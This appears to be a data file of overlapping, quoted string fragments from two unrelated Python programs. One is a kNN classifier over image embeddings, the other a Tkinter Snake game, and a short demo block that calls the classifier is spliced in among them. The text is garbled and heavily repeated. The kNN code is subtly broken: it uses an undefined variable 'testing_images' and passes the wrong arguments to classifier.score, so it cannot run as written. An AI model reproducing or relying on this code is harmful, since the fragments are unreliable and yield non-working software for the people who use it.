"metric=distance_metric, n_jobs=-1) classifier.fit(train_embeddings, train_labels) # Get predictions. test_predictions = classifier.predict(test_embeddings) # Return accuracy",
"embeddings. train_embeddings = np.array([model.inference(b) for b in train_images]) train_embeddings = train_embeddings.reshape((-1, model.embedding_size)) #",
"weights=distance_weighting, algorithm='auto', metric=distance_metric, n_jobs=-1) classifier.fit(train_embeddings, train_labels) # Get predictions. test_predictions = classifier.predict(test_embeddings) #",
"kNN. classifier = KNeighborsClassifier(n_neighbors=k, weights=distance_weighting, algorithm='auto', metric=distance_metric, n_jobs=-1) classifier.fit(train_embeddings, train_labels) # Get predictions.",
"distance_weighting='distance'): # Create training embeddings. train_embeddings = np.array([model.inference(b) for b in train_images]) train_embeddings",
"import KNeighborsClassifier def classify_from_embeddings(model, train_images, train_labels, test_images, test_labels, k=5, distance_metric='mahalanobis', distance_weighting='distance'): # Create",
"b in train_images]) train_embeddings = train_embeddings.reshape((-1, model.embedding_size)) # Create testing embeddings. test_embeddings =",
"in testing_images]) test_embeddings = test_embeddings.reshape((-1, model.embedding_size)) # Train kNN. classifier = KNeighborsClassifier(n_neighbors=k, weights=distance_weighting,",
"classify_from_embeddings(model, train_images, train_labels, test_images, test_labels, k=5, distance_metric='mahalanobis', distance_weighting='distance'): # Create training embeddings. train_embeddings",
"= classifier.predict(test_embeddings) # Return accuracy of kNN. accuracy = classifier.score(test_labels, test_predictions) return accuracy",
"train_embeddings = train_embeddings.reshape((-1, model.embedding_size)) # Create testing embeddings. test_embeddings = np.array([model.inference(b) for b",
"= np.array([model.inference(b) for b in testing_images]) test_embeddings = test_embeddings.reshape((-1, model.embedding_size)) # Train kNN.",
"for b in testing_images]) test_embeddings = test_embeddings.reshape((-1, model.embedding_size)) # Train kNN. classifier =",
"b in testing_images]) test_embeddings = test_embeddings.reshape((-1, model.embedding_size)) # Train kNN. classifier = KNeighborsClassifier(n_neighbors=k,",
"testing_images]) test_embeddings = test_embeddings.reshape((-1, model.embedding_size)) # Train kNN. classifier = KNeighborsClassifier(n_neighbors=k, weights=distance_weighting, algorithm='auto',",
"Get predictions. test_predictions = classifier.predict(test_embeddings) # Return accuracy of kNN. accuracy = classifier.score(test_labels,",
"= train_embeddings.reshape((-1, model.embedding_size)) # Create testing embeddings. test_embeddings = np.array([model.inference(b) for b in",
"# Train kNN. classifier = KNeighborsClassifier(n_neighbors=k, weights=distance_weighting, algorithm='auto', metric=distance_metric, n_jobs=-1) classifier.fit(train_embeddings, train_labels) #",
"for b in train_images]) train_embeddings = train_embeddings.reshape((-1, model.embedding_size)) # Create testing embeddings. test_embeddings",
"# Get predictions. test_predictions = classifier.predict(test_embeddings) # Return accuracy of kNN. accuracy =",
"import numpy as np from sklearn.neighbors import KNeighborsClassifier def classify_from_embeddings(model, train_images, train_labels, test_images,",
"Train kNN. classifier = KNeighborsClassifier(n_neighbors=k, weights=distance_weighting, algorithm='auto', metric=distance_metric, n_jobs=-1) classifier.fit(train_embeddings, train_labels) # Get",
"classifier = KNeighborsClassifier(n_neighbors=k, weights=distance_weighting, algorithm='auto', metric=distance_metric, n_jobs=-1) classifier.fit(train_embeddings, train_labels) # Get predictions. test_predictions",
"Create training embeddings. train_embeddings = np.array([model.inference(b) for b in train_images]) train_embeddings = train_embeddings.reshape((-1,",
"embeddings. test_embeddings = np.array([model.inference(b) for b in testing_images]) test_embeddings = test_embeddings.reshape((-1, model.embedding_size)) #",
"test_labels, k=5, distance_metric='mahalanobis', distance_weighting='distance'): # Create training embeddings. train_embeddings = np.array([model.inference(b) for b"
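
A hedged, self-contained sketch exercising classify_from_embeddings above. StubModel is a made-up stand-in for whatever embedding network the original wraps; only .inference() and .embedding_size are assumed, because those are the two members the function actually touches. 'euclidean' is chosen here because 'mahalanobis' would additionally require metric_params.

import numpy as np

class StubModel:
    # hypothetical embedding model: flattens a batch and applies a fixed
    # random projection so every call is deterministic
    embedding_size = 8
    def inference(self, batch):
        flat = batch.reshape(len(batch), -1)
        rng = np.random.default_rng(0)          # fixed seed -> same projection
        w = rng.standard_normal((flat.shape[1], self.embedding_size))
        return flat @ w

rng = np.random.default_rng(1)
train_x = rng.standard_normal((4, 20, 4, 4))    # 4 batches of 20 "images"
train_y = rng.integers(0, 3, size=80)           # one label per flattened image
test_x  = rng.standard_normal((2, 20, 4, 4))
test_y  = rng.integers(0, 3, size=40)

acc = classify_from_embeddings(StubModel(), train_x, train_y, test_x, test_y,
                               k=3, distance_metric='euclidean')
print('kNN accuracy:', acc)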
"random.randint(1, (WIDTH-SEG_SIZE) / SEG_SIZE) posy = SEG_SIZE * random.randint(1, (HEIGHT-SEG_SIZE) / SEG_SIZE) BLOCK",
"Canvas import random # Globals WIDTH = 800 HEIGHT = 600 SEG_SIZE =",
"start_game(): global s create_block() s = create_snake() # Reaction on keypress c.bind(\"<KeyPress>\", s.change_direction)",
"= Tk() root.title(\"PythonicWay Snake\") c = Canvas(root, width=WIDTH, height=HEIGHT, bg=\"#003300\") c.grid() # catch",
"[Segment(SEG_SIZE, SEG_SIZE), Segment(SEG_SIZE*2, SEG_SIZE), Segment(SEG_SIZE*3, SEG_SIZE)] return Snake(segments) # Setting up window root",
"snake segments = [Segment(SEG_SIZE, SEG_SIZE), Segment(SEG_SIZE*2, SEG_SIZE), Segment(SEG_SIZE*3, SEG_SIZE)] return Snake(segments) # Setting",
"= segments # possible moves self.mapping = {\"Down\": (0, 1), \"Right\": (1, 0),",
"segments = [Segment(SEG_SIZE, SEG_SIZE), Segment(SEG_SIZE*2, SEG_SIZE), Segment(SEG_SIZE*3, SEG_SIZE)] return Snake(segments) # Setting up",
"add_segment(self): \"\"\" Adds segment to the snake \"\"\" last_seg = c.coords(self.segments[0].instance) x =",
"= c.create_rectangle(x, y, x+SEG_SIZE, y+SEG_SIZE, fill=\"white\") class Snake(object): \"\"\" Simple Snake class \"\"\"",
"c.coords(self.segments[0].instance) x = last_seg[2] - SEG_SIZE y = last_seg[3] - SEG_SIZE self.segments.insert(0, Segment(x,",
"x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE) def add_segment(self): \"\"\" Adds segment to the snake \"\"\" last_seg =",
"gamefield edges if x2 > WIDTH or x1 < 0 or y1 <",
"for index in range(len(self.segments)-1): segment = self.segments[index].instance x1, y1, x2, y2 = c.coords(self.segments[index+1].instance)",
"fill=\"white\") class Snake(object): \"\"\" Simple Snake class \"\"\" def __init__(self, segments): self.segments =",
"= c.create_text(WIDTH/2, HEIGHT/2, text=\"GAME OVER!\", font='Arial 20', fill='red', state='hidden') restart_text = c.create_text(WIDTH/2, HEIGHT-HEIGHT/3,",
"= c.coords(self.segments[0].instance) x = last_seg[2] - SEG_SIZE y = last_seg[3] - SEG_SIZE self.segments.insert(0,",
"# Setting up window root = Tk() root.title(\"PythonicWay Snake\") c = Canvas(root, width=WIDTH,",
"y1, x2, y2 = c.coords(self.segments[index+1].instance) c.coords(segment, x1, y1, x2, y2) x1, y1, x2,",
"c.grid() # catch keypressing c.focus_set() game_over_text = c.create_text(WIDTH/2, HEIGHT/2, text=\"GAME OVER!\", font='Arial 20',",
"self.segments: c.delete(segment.instance) def set_state(item, state): c.itemconfigure(item, state=state) def clicked(event): global IN_GAME s.reset_snake() IN_GAME",
"self.mapping[\"Right\"] def move(self): \"\"\" Moves the snake with the specified vector\"\"\" for index",
"c.delete(segment.instance) def set_state(item, state): c.itemconfigure(item, state=state) def clicked(event): global IN_GAME s.reset_snake() IN_GAME =",
"x1, y1, x2, y2 = c.coords(self.segments[index+1].instance) c.coords(segment, x1, y1, x2, y2) x1, y1,",
"= c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE) def add_segment(self): \"\"\" Adds segment to",
"event.keysym in self.mapping: self.vector = self.mapping[event.keysym] def reset_snake(self): for segment in self.segments: c.delete(segment.instance)",
"state='hidden') c.itemconfigure(game_over_text, state='hidden') start_game() def start_game(): global s create_block() s = create_snake() #",
"random # Globals WIDTH = 800 HEIGHT = 600 SEG_SIZE = 20 IN_GAME",
"SEG_SIZE = 20 IN_GAME = True # Helper functions def create_block(): \"\"\" Creates",
"direction self.vector = self.mapping[\"Right\"] def move(self): \"\"\" Moves the snake with the specified",
"segments): self.segments = segments # possible moves self.mapping = {\"Down\": (0, 1), \"Right\":",
"x+SEG_SIZE, y+SEG_SIZE, fill=\"white\") class Snake(object): \"\"\" Simple Snake class \"\"\" def __init__(self, segments):",
"global s create_block() s = create_snake() # Reaction on keypress c.bind(\"<KeyPress>\", s.change_direction) main()",
"c.delete(BLOCK) c.itemconfigure(restart_text, state='hidden') c.itemconfigure(game_over_text, state='hidden') start_game() def start_game(): global s create_block() s =",
"= False root.after(100, main) # Not IN_GAME -> stop game and print message",
"in range(len(s.segments)-1): if head_coords == c.coords(s.segments[index].instance): IN_GAME = False root.after(100, main) # Not",
"y1, x2, y2) x1, y1, x2, y2 = c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE,",
"HEIGHT-HEIGHT/3, font='Arial 30', fill='white', text=\"Click here to restart\", state='hidden') c.tag_bind(restart_text, \"<Button-1>\", clicked) start_game()",
"c.itemconfigure(restart_text, state='hidden') c.itemconfigure(game_over_text, state='hidden') start_game() def start_game(): global s create_block() s = create_snake()",
"c.coords(self.segments[index+1].instance) c.coords(segment, x1, y1, x2, y2) x1, y1, x2, y2 = c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance,",
"c.delete(BLOCK) create_block() # Self-eating else: for index in range(len(s.segments)-1): if head_coords == c.coords(s.segments[index].instance):",
"'normal') set_state(game_over_text, 'normal') class Segment(object): \"\"\" Single snake segment \"\"\" def __init__(self, x,",
"bg=\"#003300\") c.grid() # catch keypressing c.focus_set() game_over_text = c.create_text(WIDTH/2, HEIGHT/2, text=\"GAME OVER!\", font='Arial",
"s = create_snake() # Reaction on keypress c.bind(\"<KeyPress>\", s.change_direction) main() def create_snake(): #",
"* random.randint(1, (HEIGHT-SEG_SIZE) / SEG_SIZE) BLOCK = c.create_oval(posx, posy, posx+SEG_SIZE, posy+SEG_SIZE, fill=\"red\") def",
"fill=\"red\") def main(): \"\"\" Handles game process \"\"\" global IN_GAME if IN_GAME: s.move()",
"Globals WIDTH = 800 HEIGHT = 600 SEG_SIZE = 20 IN_GAME = True",
"for index in range(len(s.segments)-1): if head_coords == c.coords(s.segments[index].instance): IN_GAME = False root.after(100, main)",
"Setting up window root = Tk() root.title(\"PythonicWay Snake\") c = Canvas(root, width=WIDTH, height=HEIGHT,",
"y2) x1, y1, x2, y2 = c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE) def",
"(0, 1), \"Right\": (1, 0), \"Up\": (0, -1), \"Left\": (-1, 0)} # initial",
"\"\"\" Single snake segment \"\"\" def __init__(self, x, y): self.instance = c.create_rectangle(x, y,",
"apple to be eaten \"\"\" global BLOCK posx = SEG_SIZE * random.randint(1, (WIDTH-SEG_SIZE)",
"WIDTH = 800 HEIGHT = 600 SEG_SIZE = 20 IN_GAME = True #",
"Moves the snake with the specified vector\"\"\" for index in range(len(self.segments)-1): segment =",
"possible moves self.mapping = {\"Down\": (0, 1), \"Right\": (1, 0), \"Up\": (0, -1),",
"posx = SEG_SIZE * random.randint(1, (WIDTH-SEG_SIZE) / SEG_SIZE) posy = SEG_SIZE * random.randint(1,",
"self.instance = c.create_rectangle(x, y, x+SEG_SIZE, y+SEG_SIZE, fill=\"white\") class Snake(object): \"\"\" Simple Snake class",
"c.create_oval(posx, posy, posx+SEG_SIZE, posy+SEG_SIZE, fill=\"red\") def main(): \"\"\" Handles game process \"\"\" global",
"fill='red', state='hidden') restart_text = c.create_text(WIDTH/2, HEIGHT-HEIGHT/3, font='Arial 30', fill='white', text=\"Click here to restart\",",
"= SEG_SIZE * random.randint(1, (WIDTH-SEG_SIZE) / SEG_SIZE) posy = SEG_SIZE * random.randint(1, (HEIGHT-SEG_SIZE)",
"Not IN_GAME -> stop game and print message else: set_state(restart_text, 'normal') set_state(game_over_text, 'normal')",
"class \"\"\" def __init__(self, segments): self.segments = segments # possible moves self.mapping =",
"text=\"GAME OVER!\", font='Arial 20', fill='red', state='hidden') restart_text = c.create_text(WIDTH/2, HEIGHT-HEIGHT/3, font='Arial 30', fill='white',",
"movement direction self.vector = self.mapping[\"Right\"] def move(self): \"\"\" Moves the snake with the",
"x2, y2 = c.coords(self.segments[index+1].instance) c.coords(segment, x1, y1, x2, y2) x1, y1, x2, y2",
"snake \"\"\" last_seg = c.coords(self.segments[0].instance) x = last_seg[2] - SEG_SIZE y = last_seg[3]",
"\"\"\" if event.keysym in self.mapping: self.vector = self.mapping[event.keysym] def reset_snake(self): for segment in",
"state=state) def clicked(event): global IN_GAME s.reset_snake() IN_GAME = True c.delete(BLOCK) c.itemconfigure(restart_text, state='hidden') c.itemconfigure(game_over_text,",
"range(len(s.segments)-1): if head_coords == c.coords(s.segments[index].instance): IN_GAME = False root.after(100, main) # Not IN_GAME",
"IN_GAME = False root.after(100, main) # Not IN_GAME -> stop game and print",
"== c.coords(BLOCK): s.add_segment() c.delete(BLOCK) create_block() # Self-eating else: for index in range(len(s.segments)-1): if",
"y1 < 0 or y2 > HEIGHT: IN_GAME = False # Eating apples",
"BLOCK posx = SEG_SIZE * random.randint(1, (WIDTH-SEG_SIZE) / SEG_SIZE) posy = SEG_SIZE *",
"= create_snake() # Reaction on keypress c.bind(\"<KeyPress>\", s.change_direction) main() def create_snake(): # creating",
"y2+self.vector[1]*SEG_SIZE) def add_segment(self): \"\"\" Adds segment to the snake \"\"\" last_seg = c.coords(self.segments[0].instance)",
"y, x+SEG_SIZE, y+SEG_SIZE, fill=\"white\") class Snake(object): \"\"\" Simple Snake class \"\"\" def __init__(self,",
"vector\"\"\" for index in range(len(self.segments)-1): segment = self.segments[index].instance x1, y1, x2, y2 =",
"= head_coords # Check for collision with gamefield edges if x2 > WIDTH",
"-1), \"Left\": (-1, 0)} # initial movement direction self.vector = self.mapping[\"Right\"] def move(self):",
"# Check for collision with gamefield edges if x2 > WIDTH or x1",
"= self.mapping[event.keysym] def reset_snake(self): for segment in self.segments: c.delete(segment.instance) def set_state(item, state): c.itemconfigure(item,",
"HEIGHT: IN_GAME = False # Eating apples elif head_coords == c.coords(BLOCK): s.add_segment() c.delete(BLOCK)",
"SEG_SIZE)] return Snake(segments) # Setting up window root = Tk() root.title(\"PythonicWay Snake\") c",
"y)) def change_direction(self, event): \"\"\" Changes direction of snake \"\"\" if event.keysym in",
"tkinter import Tk, Canvas import random # Globals WIDTH = 800 HEIGHT =",
"for collision with gamefield edges if x2 > WIDTH or x1 < 0",
"c.coords(segment, x1, y1, x2, y2) x1, y1, x2, y2 = c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE,",
"= False # Eating apples elif head_coords == c.coords(BLOCK): s.add_segment() c.delete(BLOCK) create_block() #",
"to the snake \"\"\" last_seg = c.coords(self.segments[0].instance) x = last_seg[2] - SEG_SIZE y",
"state='hidden') start_game() def start_game(): global s create_block() s = create_snake() # Reaction on",
"= last_seg[3] - SEG_SIZE self.segments.insert(0, Segment(x, y)) def change_direction(self, event): \"\"\" Changes direction",
"s.move() head_coords = c.coords(s.segments[-1].instance) x1, y1, x2, y2 = head_coords # Check for",
"event): \"\"\" Changes direction of snake \"\"\" if event.keysym in self.mapping: self.vector =",
"font='Arial 30', fill='white', text=\"Click here to restart\", state='hidden') c.tag_bind(restart_text, \"<Button-1>\", clicked) start_game() root.mainloop()",
"print message else: set_state(restart_text, 'normal') set_state(game_over_text, 'normal') class Segment(object): \"\"\" Single snake segment",
"True # Helper functions def create_block(): \"\"\" Creates an apple to be eaten",
"\"Left\": (-1, 0)} # initial movement direction self.vector = self.mapping[\"Right\"] def move(self): \"\"\"",
"x, y): self.instance = c.create_rectangle(x, y, x+SEG_SIZE, y+SEG_SIZE, fill=\"white\") class Snake(object): \"\"\" Simple",
"set_state(restart_text, 'normal') set_state(game_over_text, 'normal') class Segment(object): \"\"\" Single snake segment \"\"\" def __init__(self,",
"start_game() def start_game(): global s create_block() s = create_snake() # Reaction on keypress",
"Self-eating else: for index in range(len(s.segments)-1): if head_coords == c.coords(s.segments[index].instance): IN_GAME = False",
"moves self.mapping = {\"Down\": (0, 1), \"Right\": (1, 0), \"Up\": (0, -1), \"Left\":",
"Handles game process \"\"\" global IN_GAME if IN_GAME: s.move() head_coords = c.coords(s.segments[-1].instance) x1,",
"(0, -1), \"Left\": (-1, 0)} # initial movement direction self.vector = self.mapping[\"Right\"] def",
"\"\"\" Moves the snake with the specified vector\"\"\" for index in range(len(self.segments)-1): segment",
"game process \"\"\" global IN_GAME if IN_GAME: s.move() head_coords = c.coords(s.segments[-1].instance) x1, y1,",
"IN_GAME if IN_GAME: s.move() head_coords = c.coords(s.segments[-1].instance) x1, y1, x2, y2 = head_coords",
"= SEG_SIZE * random.randint(1, (HEIGHT-SEG_SIZE) / SEG_SIZE) BLOCK = c.create_oval(posx, posy, posx+SEG_SIZE, posy+SEG_SIZE,",
"def __init__(self, segments): self.segments = segments # possible moves self.mapping = {\"Down\": (0,",
"Snake(object): \"\"\" Simple Snake class \"\"\" def __init__(self, segments): self.segments = segments #",
"IN_GAME = True c.delete(BLOCK) c.itemconfigure(restart_text, state='hidden') c.itemconfigure(game_over_text, state='hidden') start_game() def start_game(): global s",
"x1 < 0 or y1 < 0 or y2 > HEIGHT: IN_GAME =",
"class Snake(object): \"\"\" Simple Snake class \"\"\" def __init__(self, segments): self.segments = segments",
"\"\"\" def __init__(self, segments): self.segments = segments # possible moves self.mapping = {\"Down\":",
"\"Up\": (0, -1), \"Left\": (-1, 0)} # initial movement direction self.vector = self.mapping[\"Right\"]",
"- SEG_SIZE y = last_seg[3] - SEG_SIZE self.segments.insert(0, Segment(x, y)) def change_direction(self, event):",
"# catch keypressing c.focus_set() game_over_text = c.create_text(WIDTH/2, HEIGHT/2, text=\"GAME OVER!\", font='Arial 20', fill='red',",
"index in range(len(self.segments)-1): segment = self.segments[index].instance x1, y1, x2, y2 = c.coords(self.segments[index+1].instance) c.coords(segment,",
"x1, y1, x2, y2 = c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE) def add_segment(self):",
"snake with the specified vector\"\"\" for index in range(len(self.segments)-1): segment = self.segments[index].instance x1,",
"root = Tk() root.title(\"PythonicWay Snake\") c = Canvas(root, width=WIDTH, height=HEIGHT, bg=\"#003300\") c.grid() #",
"with the specified vector\"\"\" for index in range(len(self.segments)-1): segment = self.segments[index].instance x1, y1,",
"def create_snake(): # creating segments and snake segments = [Segment(SEG_SIZE, SEG_SIZE), Segment(SEG_SIZE*2, SEG_SIZE),",
"posx+SEG_SIZE, posy+SEG_SIZE, fill=\"red\") def main(): \"\"\" Handles game process \"\"\" global IN_GAME if",
"y1, x2, y2 = head_coords # Check for collision with gamefield edges if",
"SEG_SIZE * random.randint(1, (WIDTH-SEG_SIZE) / SEG_SIZE) posy = SEG_SIZE * random.randint(1, (HEIGHT-SEG_SIZE) /",
"def main(): \"\"\" Handles game process \"\"\" global IN_GAME if IN_GAME: s.move() head_coords",
"or y1 < 0 or y2 > HEIGHT: IN_GAME = False # Eating",
"state='hidden') restart_text = c.create_text(WIDTH/2, HEIGHT-HEIGHT/3, font='Arial 30', fill='white', text=\"Click here to restart\", state='hidden')",
"BLOCK = c.create_oval(posx, posy, posx+SEG_SIZE, posy+SEG_SIZE, fill=\"red\") def main(): \"\"\" Handles game process",
"self.segments = segments # possible moves self.mapping = {\"Down\": (0, 1), \"Right\": (1,",
"# Globals WIDTH = 800 HEIGHT = 600 SEG_SIZE = 20 IN_GAME =",
"HEIGHT = 600 SEG_SIZE = 20 IN_GAME = True # Helper functions def",
"x1, y1, x2, y2 = head_coords # Check for collision with gamefield edges",
"= 600 SEG_SIZE = 20 IN_GAME = True # Helper functions def create_block():",
"or y2 > HEIGHT: IN_GAME = False # Eating apples elif head_coords ==",
"set_state(game_over_text, 'normal') class Segment(object): \"\"\" Single snake segment \"\"\" def __init__(self, x, y):",
"game_over_text = c.create_text(WIDTH/2, HEIGHT/2, text=\"GAME OVER!\", font='Arial 20', fill='red', state='hidden') restart_text = c.create_text(WIDTH/2,",
"\"\"\" global IN_GAME if IN_GAME: s.move() head_coords = c.coords(s.segments[-1].instance) x1, y1, x2, y2",
"to be eaten \"\"\" global BLOCK posx = SEG_SIZE * random.randint(1, (WIDTH-SEG_SIZE) /",
"< 0 or y1 < 0 or y2 > HEIGHT: IN_GAME = False",
"class Segment(object): \"\"\" Single snake segment \"\"\" def __init__(self, x, y): self.instance =",
"Segment(SEG_SIZE*2, SEG_SIZE), Segment(SEG_SIZE*3, SEG_SIZE)] return Snake(segments) # Setting up window root = Tk()",
"SEG_SIZE) posy = SEG_SIZE * random.randint(1, (HEIGHT-SEG_SIZE) / SEG_SIZE) BLOCK = c.create_oval(posx, posy,",
"0 or y2 > HEIGHT: IN_GAME = False # Eating apples elif head_coords",
"self.segments.insert(0, Segment(x, y)) def change_direction(self, event): \"\"\" Changes direction of snake \"\"\" if",
"self.mapping = {\"Down\": (0, 1), \"Right\": (1, 0), \"Up\": (0, -1), \"Left\": (-1,",
"y+SEG_SIZE, fill=\"white\") class Snake(object): \"\"\" Simple Snake class \"\"\" def __init__(self, segments): self.segments",
"= 20 IN_GAME = True # Helper functions def create_block(): \"\"\" Creates an",
"an apple to be eaten \"\"\" global BLOCK posx = SEG_SIZE * random.randint(1,",
"IN_GAME s.reset_snake() IN_GAME = True c.delete(BLOCK) c.itemconfigure(restart_text, state='hidden') c.itemconfigure(game_over_text, state='hidden') start_game() def start_game():",
"change_direction(self, event): \"\"\" Changes direction of snake \"\"\" if event.keysym in self.mapping: self.vector",
"game and print message else: set_state(restart_text, 'normal') set_state(game_over_text, 'normal') class Segment(object): \"\"\" Single",
"segments and snake segments = [Segment(SEG_SIZE, SEG_SIZE), Segment(SEG_SIZE*2, SEG_SIZE), Segment(SEG_SIZE*3, SEG_SIZE)] return Snake(segments)",
"def add_segment(self): \"\"\" Adds segment to the snake \"\"\" last_seg = c.coords(self.segments[0].instance) x",
"x = last_seg[2] - SEG_SIZE y = last_seg[3] - SEG_SIZE self.segments.insert(0, Segment(x, y))",
"s create_block() s = create_snake() # Reaction on keypress c.bind(\"<KeyPress>\", s.change_direction) main() def",
"HEIGHT/2, text=\"GAME OVER!\", font='Arial 20', fill='red', state='hidden') restart_text = c.create_text(WIDTH/2, HEIGHT-HEIGHT/3, font='Arial 30',",
"SEG_SIZE), Segment(SEG_SIZE*3, SEG_SIZE)] return Snake(segments) # Setting up window root = Tk() root.title(\"PythonicWay",
"up window root = Tk() root.title(\"PythonicWay Snake\") c = Canvas(root, width=WIDTH, height=HEIGHT, bg=\"#003300\")",
"SEG_SIZE), Segment(SEG_SIZE*2, SEG_SIZE), Segment(SEG_SIZE*3, SEG_SIZE)] return Snake(segments) # Setting up window root =",
"def start_game(): global s create_block() s = create_snake() # Reaction on keypress c.bind(\"<KeyPress>\",",
"SEG_SIZE) BLOCK = c.create_oval(posx, posy, posx+SEG_SIZE, posy+SEG_SIZE, fill=\"red\") def main(): \"\"\" Handles game",
"# Helper functions def create_block(): \"\"\" Creates an apple to be eaten \"\"\"",
"segment in self.segments: c.delete(segment.instance) def set_state(item, state): c.itemconfigure(item, state=state) def clicked(event): global IN_GAME",
"the specified vector\"\"\" for index in range(len(self.segments)-1): segment = self.segments[index].instance x1, y1, x2,",
"direction of snake \"\"\" if event.keysym in self.mapping: self.vector = self.mapping[event.keysym] def reset_snake(self):",
"/ SEG_SIZE) posy = SEG_SIZE * random.randint(1, (HEIGHT-SEG_SIZE) / SEG_SIZE) BLOCK = c.create_oval(posx,",
"y = last_seg[3] - SEG_SIZE self.segments.insert(0, Segment(x, y)) def change_direction(self, event): \"\"\" Changes",
"index in range(len(s.segments)-1): if head_coords == c.coords(s.segments[index].instance): IN_GAME = False root.after(100, main) #",
"'normal') class Segment(object): \"\"\" Single snake segment \"\"\" def __init__(self, x, y): self.instance",
"height=HEIGHT, bg=\"#003300\") c.grid() # catch keypressing c.focus_set() game_over_text = c.create_text(WIDTH/2, HEIGHT/2, text=\"GAME OVER!\",",
"- SEG_SIZE self.segments.insert(0, Segment(x, y)) def change_direction(self, event): \"\"\" Changes direction of snake",
"-> stop game and print message else: set_state(restart_text, 'normal') set_state(game_over_text, 'normal') class Segment(object):",
"800 HEIGHT = 600 SEG_SIZE = 20 IN_GAME = True # Helper functions",
"Tk, Canvas import random # Globals WIDTH = 800 HEIGHT = 600 SEG_SIZE",
"<reponame>MadJedi/pythonsnakegame<gh_stars>0 from tkinter import Tk, Canvas import random # Globals WIDTH = 800",
"\"\"\" Simple Snake class \"\"\" def __init__(self, segments): self.segments = segments # possible",
"20', fill='red', state='hidden') restart_text = c.create_text(WIDTH/2, HEIGHT-HEIGHT/3, font='Arial 30', fill='white', text=\"Click here to",
"= [Segment(SEG_SIZE, SEG_SIZE), Segment(SEG_SIZE*2, SEG_SIZE), Segment(SEG_SIZE*3, SEG_SIZE)] return Snake(segments) # Setting up window",
"main(): \"\"\" Handles game process \"\"\" global IN_GAME if IN_GAME: s.move() head_coords =",
"OVER!\", font='Arial 20', fill='red', state='hidden') restart_text = c.create_text(WIDTH/2, HEIGHT-HEIGHT/3, font='Arial 30', fill='white', text=\"Click",
"root.after(100, main) # Not IN_GAME -> stop game and print message else: set_state(restart_text,",
"catch keypressing c.focus_set() game_over_text = c.create_text(WIDTH/2, HEIGHT/2, text=\"GAME OVER!\", font='Arial 20', fill='red', state='hidden')",
"IN_GAME = True # Helper functions def create_block(): \"\"\" Creates an apple to",
"c.bind(\"<KeyPress>\", s.change_direction) main() def create_snake(): # creating segments and snake segments = [Segment(SEG_SIZE,",
"c.coords(s.segments[index].instance): IN_GAME = False root.after(100, main) # Not IN_GAME -> stop game and",
"WIDTH or x1 < 0 or y1 < 0 or y2 > HEIGHT:",
"segment = self.segments[index].instance x1, y1, x2, y2 = c.coords(self.segments[index+1].instance) c.coords(segment, x1, y1, x2,",
"Simple Snake class \"\"\" def __init__(self, segments): self.segments = segments # possible moves",
"initial movement direction self.vector = self.mapping[\"Right\"] def move(self): \"\"\" Moves the snake with",
"\"\"\" Handles game process \"\"\" global IN_GAME if IN_GAME: s.move() head_coords = c.coords(s.segments[-1].instance)",
"creating segments and snake segments = [Segment(SEG_SIZE, SEG_SIZE), Segment(SEG_SIZE*2, SEG_SIZE), Segment(SEG_SIZE*3, SEG_SIZE)] return",
"y2 = head_coords # Check for collision with gamefield edges if x2 >",
"width=WIDTH, height=HEIGHT, bg=\"#003300\") c.grid() # catch keypressing c.focus_set() game_over_text = c.create_text(WIDTH/2, HEIGHT/2, text=\"GAME",
"functions def create_block(): \"\"\" Creates an apple to be eaten \"\"\" global BLOCK",
"s.reset_snake() IN_GAME = True c.delete(BLOCK) c.itemconfigure(restart_text, state='hidden') c.itemconfigure(game_over_text, state='hidden') start_game() def start_game(): global",
"move(self): \"\"\" Moves the snake with the specified vector\"\"\" for index in range(len(self.segments)-1):",
"else: for index in range(len(s.segments)-1): if head_coords == c.coords(s.segments[index].instance): IN_GAME = False root.after(100,",
"< 0 or y2 > HEIGHT: IN_GAME = False # Eating apples elif",
"c.coords(s.segments[-1].instance) x1, y1, x2, y2 = head_coords # Check for collision with gamefield",
"head_coords == c.coords(s.segments[index].instance): IN_GAME = False root.after(100, main) # Not IN_GAME -> stop",
"global IN_GAME if IN_GAME: s.move() head_coords = c.coords(s.segments[-1].instance) x1, y1, x2, y2 =",
"eaten \"\"\" global BLOCK posx = SEG_SIZE * random.randint(1, (WIDTH-SEG_SIZE) / SEG_SIZE) posy",
"= c.coords(s.segments[-1].instance) x1, y1, x2, y2 = head_coords # Check for collision with",
"20 IN_GAME = True # Helper functions def create_block(): \"\"\" Creates an apple",
"def change_direction(self, event): \"\"\" Changes direction of snake \"\"\" if event.keysym in self.mapping:",
"self.mapping[event.keysym] def reset_snake(self): for segment in self.segments: c.delete(segment.instance) def set_state(item, state): c.itemconfigure(item, state=state)",
"y2 = c.coords(self.segments[-2].instance) c.coords(self.segments[-1].instance, x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE) def add_segment(self): \"\"\" Adds segment",
"1), \"Right\": (1, 0), \"Up\": (0, -1), \"Left\": (-1, 0)} # initial movement",
"600 SEG_SIZE = 20 IN_GAME = True # Helper functions def create_block(): \"\"\"",
"for segment in self.segments: c.delete(segment.instance) def set_state(item, state): c.itemconfigure(item, state=state) def clicked(event): global",
"0)} # initial movement direction self.vector = self.mapping[\"Right\"] def move(self): \"\"\" Moves the",
"of snake \"\"\" if event.keysym in self.mapping: self.vector = self.mapping[event.keysym] def reset_snake(self): for",
"x1+self.vector[0]*SEG_SIZE, y1+self.vector[1]*SEG_SIZE, x2+self.vector[0]*SEG_SIZE, y2+self.vector[1]*SEG_SIZE) def add_segment(self): \"\"\" Adds segment to the snake \"\"\"",
